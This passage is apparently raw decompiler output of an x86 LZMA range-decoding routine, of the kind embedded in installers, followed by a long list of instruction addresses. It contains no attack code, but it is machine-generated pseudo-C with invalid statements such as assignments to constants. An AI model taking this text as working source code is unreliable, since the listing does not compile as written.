									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t217 = __edx + 1; // 0x1
								__ebx = _t217;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							goto L69;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							L56:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1a;
								goto L170;
							}
							__ecx =  *(__ebp - 0x68);
							__al =  *(__ebp - 0x5c);
							__edx =  *(__ebp - 8);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
							 *( *(__ebp - 0x68)) = __al;
							__ecx =  *(__ebp - 0x14);
							 *(__ecx +  *(__ebp - 8)) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t192 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t192;
							goto L79;
						case 0x1b:
							goto L75;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = _t414;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                      0x00000000
                      0x00406398
                      0x00406398
                      0x0040639c
                      0x00406453
                      0x00406456
                      0x00406462
                      0x00406343
                      0x00406343
                      0x00406346
                      0x004066b8
                      0x004066b8
                      0x004066bb
                      0x004066bb
                      0x004066c1
                      0x004066c7
                      0x004066cd
                      0x004066e7
                      0x004066ea
                      0x004066f0
                      0x004066fb
                      0x004066fd
                      0x004066cf
                      0x004066cf
                      0x004066de
                      0x004066e2
                      0x004066e2
                      0x00406707
                      0x0040672e
                      0x0040672e
                      0x00406734
                      0x00406734
                      0x00000000
                      0x00406709
                      0x00406709
                      0x0040670d
                      0x004068bc
                      0x00000000
                      0x004068bc
                      0x00406719
                      0x00406720
                      0x00406728
                      0x0040672b
                      0x00000000
                      0x0040672b
                      0x004063a2
                      0x004063a6
                      0x004068e7
                      0x004068e7
                      0x004068ea
                      0x004068ee
                      0x004068ee
                      0x004063ac
                      0x004063b2
                      0x004063b5
                      0x004063b9
                      0x004063bc
                      0x004063c0
                      0x00406886
                      0x004068d2
                      0x004068da
                      0x004068e1
                      0x004068e3
                      0x00000000
                      0x004068e3
                      0x004063c6
                      0x004063c9
                      0x004063cf
                      0x004063d1
                      0x004063d1
                      0x004063d4
                      0x004063d7
                      0x004063da
                      0x004063dd
                      0x004063e0
                      0x004063e3
                      0x004063e4
                      0x004063e6
                      0x004063e6
                      0x004063e6
                      0x004063e9
                      0x004063ec
                      0x004063ef
                      0x004063f2
                      0x004063f2
                      0x004063f5
                      0x004063f7
                      0x004063f7
                      0x004063fa
                      0x004063fa
                      0x004063fa
                      0x00405ed0
                      0x00405ed0
                      0x00405ed9
                      0x00000000
                      0x00000000
                      0x00405edf
                      0x00000000
                      0x00405eea
                      0x00000000
                      0x00000000
                      0x00405ef3
                      0x00405ef6
                      0x00405ef9
                      0x00405efd
                      0x00000000
                      0x00000000
                      0x00405f03
                      0x00405f06
                      0x00405f08
                      0x00405f09
                      0x00405f0c
                      0x00405f0e
                      0x00405f0f
                      0x00405f11
                      0x00405f14
                      0x00405f19
                      0x00405f1e
                      0x00405f27
                      0x00405f3a
                      0x00405f3d
                      0x00405f49
                      0x00405f71
                      0x00405f73
                      0x00405f81
                      0x00405f81
                      0x00405f85
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00405f75
                      0x00405f75
                      0x00405f78
                      0x00405f79
                      0x00405f79
                      0x00000000
                      0x00405f75
                      0x00405f4f
                      0x00405f54
                      0x00405f54
                      0x00405f5d
                      0x00405f65
                      0x00405f68
                      0x00000000
                      0x00405f6e
                      0x00405f6e
                      0x00000000
                      0x00405f6e
                      0x00000000
                      0x00405f8b
                      0x00405f8b
                      0x00405f8f
                      0x0040683b
                      0x00000000
                      0x0040683b
                      0x00405f98
                      0x00405fa8
                      0x00405fab
                      0x00405fae
                      0x00405fae
                      0x00405fae
                      0x00405fb1
                      0x00405fb5
                      0x00000000
                      0x00000000
                      0x00405fb7
                      0x00405fbd
                      0x00405fe7
                      0x00405fed
                      0x00405ff4
                      0x00000000
                      0x00405ff4
                      0x00405fc3
                      0x00405fc6
                      0x00405fcb
                      0x00405fcb
                      0x00405fd6
                      0x00405fde
                      0x00405fe1
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00406026
                      0x0040602c
                      0x0040602f
                      0x0040603c
                      0x00406044
                      0x00000000
                      0x00000000
                      0x00405ffb
                      0x00405ffb
                      0x00405fff
                      0x0040684a
                      0x00000000
                      0x0040684a
                      0x0040600b
                      0x00406016
                      0x00406016
                      0x00406016
                      0x00406019
                      0x0040601c
                      0x0040601f
                      0x00406024
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0040604c
                      0x0040604e
                      0x00406051
                      0x004060c2
                      0x004060c5
                      0x004060c8
                      0x004060cf
                      0x004060d9
                      0x00000000
                      0x004060d9
                      0x00406053
                      0x00406057
                      0x0040605a
                      0x0040605c
                      0x0040605f
                      0x00406062
                      0x00406064
                      0x00406067
                      0x00406069
                      0x0040606e
                      0x00406071
                      0x00406074
                      0x00406078
                      0x0040607f
                      0x00406082
                      0x00406089
                      0x0040608d
                      0x00406095
                      0x00406095
                      0x00406095
                      0x0040608f
                      0x0040608f
                      0x0040608f
                      0x00406084
                      0x00406084
                      0x00406084
                      0x00406099
                      0x0040609c
                      0x004060ba
                      0x004060bc
                      0x00000000
                      0x0040609e
                      0x0040609e
                      0x004060a1
                      0x004060a4
                      0x004060a7
                      0x004060a9
                      0x004060a9
                      0x004060a9
                      0x004060ac
                      0x004060af
                      0x004060b1
                      0x004060b2
                      0x004060b5
                      0x00000000
                      0x004060b5
                      0x00000000
                      0x004062eb
                      0x004062ef
                      0x0040630d
                      0x00406310
                      0x00406317
                      0x0040631a
                      0x0040631d
                      0x00406320
                      0x00406323
                      0x00406326
                      0x00406328
                      0x0040632f
                      0x00406330
                      0x00406332
                      0x00406335
                      0x00406338
                      0x0040633b
                      0x0040633b
                      0x00406340
                      0x00000000
                      0x00406340
                      0x004062f1
                      0x004062f4
                      0x004062f7
                      0x00406301
                      0x00000000
                      0x00000000
                      0x00406355
                      0x00406359
                      0x0040637c
                      0x0040637f
                      0x00406382
                      0x0040638c
                      0x0040635b
                      0x0040635b
                      0x0040635e
                      0x00406361
                      0x00406364
                      0x00406371
                      0x00406374
                      0x00406374
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00406409
                      0x0040640d
                      0x00406414
                      0x00406417
                      0x0040641a
                      0x00406424
                      0x00000000
                      0x00406424
                      0x0040640f
                      0x00000000
                      0x00000000
                      0x00406430
                      0x00406434
                      0x0040643b
                      0x0040643e
                      0x00406441
                      0x00406436
                      0x00406436
                      0x00406436
                      0x00406444
                      0x00406447
                      0x0040644a
                      0x0040644a
                      0x0040644d
                      0x00406450
                      0x00000000
                      0x00000000
                      0x004064f0
                      0x004064f0
                      0x004064f4
                      0x00406892
                      0x00000000
                      0x00406892
                      0x004064fa
                      0x004064fd
                      0x00406500
                      0x00406504
                      0x00406507
                      0x0040650d
                      0x0040650f
                      0x0040650f
                      0x0040650f
                      0x00406512
                      0x00406515
                      0x00000000
                      0x00000000
                      0x004060e5
                      0x004060e5
                      0x004060e9
                      0x00406856
                      0x00000000
                      0x00406856
                      0x004060ef
                      0x004060f2
                      0x004060f5
                      0x004060f9
                      0x004060fc
                      0x00406102
                      0x00406104
                      0x00406104
                      0x00406104
                      0x00406107
                      0x0040610a
                      0x0040610a
                      0x0040610d
                      0x00406110
                      0x00000000
                      0x00000000
                      0x00406116
                      0x0040611c
                      0x00000000
                      0x00000000
                      0x00406122
                      0x00406122
                      0x00406126
                      0x00406129
                      0x0040612c
                      0x0040612f
                      0x00406132
                      0x00406133
                      0x00406136
                      0x00406138
                      0x0040613e
                      0x00406141
                      0x00406144
                      0x00406147
                      0x0040614a
                      0x0040614d
                      0x00406150
                      0x0040616c
                      0x0040616f
                      0x00406172
                      0x00406175
                      0x0040617c
                      0x00406180
                      0x00406182
                      0x00406186
                      0x00406152
                      0x00406152
                      0x00406156
                      0x0040615e
                      0x00406163
                      0x00406165
                      0x00406167
                      0x00406167
                      0x00406189
                      0x00406190
                      0x00406193
                      0x00000000
                      0x00406199
                      0x00000000
                      0x00406199
                      0x00000000
                      0x0040619e
                      0x0040619e
                      0x004061a2
                      0x00406862
                      0x00000000
                      0x00406862
                      0x004061a8
                      0x004061ab
                      0x004061ae
                      0x004061b2
                      0x004061b5
                      0x004061bb
                      0x004061bd
                      0x004061bd
                      0x004061bd
                      0x004061c0
                      0x004061c3
                      0x004061c3
                      0x004061c3
                      0x004061c9
                      0x00000000
                      0x00000000
                      0x004061cb
                      0x004061ce
                      0x004061d1
                      0x004061d4
                      0x004061d7
                      0x004061da
                      0x004061dd
                      0x004061e0
                      0x004061e3
                      0x004061e6
                      0x004061e9
                      0x00406201
                      0x00406204
                      0x00406207
                      0x0040620a
                      0x0040620a
                      0x0040620d
                      0x00406211
                      0x00406213
                      0x004061eb
                      0x004061eb
                      0x004061f3
                      0x004061f8
                      0x004061fa
                      0x004061fc
                      0x004061fc
                      0x00406216
                      0x0040621d
                      0x00406220
                      0x00000000
                      0x00406222
                      0x00000000
                      0x00406222
                      0x00406220
                      0x00406227
                      0x00406227
                      0x00406227
                      0x00406227
                      0x00000000
                      0x00000000
                      0x00406262
                      0x00406262
                      0x00406266
                      0x0040686e
                      0x00000000
                      0x0040686e
                      0x0040626c
                      0x0040626f
                      0x00406272
                      0x00406276
                      0x00406279
                      0x0040627f
                      0x00406281
                      0x00406281
                      0x00406281
                      0x00406284
                      0x00406287
                      0x00406287
                      0x0040628d
                      0x0040622b
                      0x0040622b
                      0x0040622e
                      0x00000000
                      0x0040622e
                      0x0040628f
                      0x0040628f
                      0x00406292
                      0x00406295
                      0x00406298
                      0x0040629b
                      0x0040629e
                      0x004062a1
                      0x004062a4
                      0x004062a7
                      0x004062aa
                      0x004062ad
                      0x004062c5
                      0x004062c8
                      0x004062cb
                      0x004062ce
                      0x004062ce
                      0x004062d1
                      0x004062d5
                      0x004062d7
                      0x004062af
                      0x004062af
                      0x004062b7
                      0x004062bc
                      0x004062be
                      0x004062c0
                      0x004062c0
                      0x004062da
                      0x004062e1
                      0x004062e4
                      0x00000000
                      0x004062e6
                      0x00000000
                      0x004062e6
                      0x00000000
                      0x00406573
                      0x00406573
                      0x00406577
                      0x0040689e
                      0x00000000
                      0x0040689e
                      0x0040657d
                      0x00406580
                      0x00406583
                      0x00406587
                      0x0040658a
                      0x00406590
                      0x00406592
                      0x00406592
                      0x00406592
                      0x00406595
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00406682
                      0x00406686
                      0x004066a8
                      0x004066ab
                      0x004066b5
                      0x00000000
                      0x004066b5
                      0x00406688
                      0x0040668b
                      0x0040668f
                      0x00406692
                      0x00406692
                      0x00406695
                      0x00000000
                      0x00000000
                      0x0040673f
                      0x00406743
                      0x00406761
                      0x00406761
                      0x00406761
                      0x00406768
                      0x0040676f
                      0x00406776
                      0x00406776
                      0x00000000
                      0x00406776
                      0x00406745
                      0x00406748
                      0x0040674b
                      0x0040674e
                      0x00406755
                      0x00406699
                      0x00406699
                      0x0040669c
                      0x00000000
                      0x00000000
                      0x00406830
                      0x00406833
                      0x00000000
                      0x00000000
                      0x0040646a
                      0x0040646c
                      0x00406473
                      0x00406474
                      0x00406476
                      0x00406479
                      0x00000000
                      0x00000000
                      0x00406481
                      0x00406484
                      0x00406487
                      0x00406489
                      0x0040648b
                      0x0040648b
                      0x0040648c
                      0x0040648f
                      0x00406496
                      0x00406499
                      0x004064a7
                      0x00000000
                      0x00000000
                      0x0040677d
                      0x0040677d
                      0x00406780
                      0x00406787
                      0x00000000
                      0x00000000
                      0x0040678c
                      0x0040678c
                      0x00406790
                      0x004068c8
                      0x00000000
                      0x004068c8
                      0x00406796
                      0x00406799
                      0x0040679c
                      0x004067a0
                      0x004067a3
                      0x004067a9
                      0x004067ab
                      0x004067ab
                      0x004067ab
                      0x004067ae
                      0x004067b1
                      0x004067b1
                      0x004067b1
                      0x004067b1
                      0x004067b4
                      0x004067b4
                      0x004067b8
                      0x00406818
                      0x0040681b
                      0x00406820
                      0x00406821
                      0x00406823
                      0x00406825
                      0x00406828
                      0x00000000
                      0x00406828
                      0x004067ba
                      0x004067c0
                      0x004067c3
                      0x004067c6
                      0x004067c9
                      0x004067cc
                      0x004067cf
                      0x004067d2
                      0x004067d5
                      0x004067d8
                      0x004067db
                      0x004067f4
                      0x004067f7
                      0x004067fa
                      0x004067fd
                      0x00406801
                      0x00406803
                      0x00406803
                      0x00406804
                      0x00406807
                      0x004067dd
                      0x004067dd
                      0x004067e5
                      0x004067ea
                      0x004067ec
                      0x004067ef
                      0x004067ef
                      0x0040680a
                      0x00406811
                      0x00000000
                      0x00406813
                      0x00000000
                      0x00406813
                      0x00000000
                      0x004064af
                      0x004064b2
                      0x004064e8
                      0x00406618
                      0x00406618
                      0x00406618
                      0x00406618
                      0x0040661b
                      0x0040661b
                      0x0040661e
                      0x00406620
                      0x004068aa
                      0x00000000
                      0x004068aa
                      0x00406626
                      0x00406629
                      0x00000000
                      0x00000000
                      0x0040662f
                      0x00406633
                      0x00406636
                      0x00406636
                      0x00406636
                      0x00000000
                      0x00406636
                      0x004064b4
                      0x004064b6
                      0x004064b8
                      0x004064ba
                      0x004064bd
                      0x004064be
                      0x004064c0
                      0x004064c2
                      0x004064c5
                      0x004064c8
                      0x004064de
                      0x004064e3
                      0x0040651b
                      0x0040651b
                      0x0040651f
                      0x0040654b
                      0x0040654d
                      0x00406554
                      0x00406557
                      0x0040655a
                      0x0040655a
                      0x0040655f
                      0x0040655f
                      0x00406561
                      0x00406564
                      0x0040656b
                      0x0040656e
                      0x0040659b
                      0x0040659b
                      0x0040659e
                      0x004065a1
                      0x00406615
                      0x00406615
                      0x00406615
                      0x00000000
                      0x00406615
                      0x004065a3
                      0x004065a9
                      0x004065ac
                      0x004065af
                      0x004065b2
                      0x004065b5
                      0x004065b8
                      0x004065bb
                      0x004065be
                      0x004065c1
                      0x004065c4
                      0x004065dd
                      0x004065df
                      0x004065e2
                      0x004065e3
                      0x004065e6
                      0x004065e8
                      0x004065eb
                      0x004065ed
                      0x004065ef
                      0x004065f2
                      0x004065f4
                      0x004065f7
                      0x004065fb
                      0x004065fd
                      0x004065fd
                      0x004065fe
                      0x00406601
                      0x00406604
                      0x004065c6
                      0x004065c6
                      0x004065ce
                      0x004065d3
                      0x004065d5
                      0x004065d8
                      0x004065d8
                      0x00406607
                      0x0040660e
                      0x00406598
                      0x00406598
                      0x00406598
                      0x00406598
                      0x00000000
                      0x00406610
                      0x00000000
                      0x00406610
                      0x0040660e
                      0x00406521
                      0x00406524
                      0x00406526
                      0x00406529
                      0x0040652c
                      0x0040652f
                      0x00406531
                      0x00406534
                      0x00406537
                      0x00406537
                      0x0040653a
                      0x0040653a
                      0x0040653d
                      0x00406544
                      0x00406518
                      0x00406518
                      0x00406518
                      0x00406518
                      0x00000000
                      0x00406546
                      0x00000000
                      0x00406546
                      0x00406544
                      0x004064ca
                      0x004064cd
                      0x004064cf
                      0x004064d2
                      0x00000000
                      0x00000000
                      0x00406231
                      0x00406231
                      0x00406235
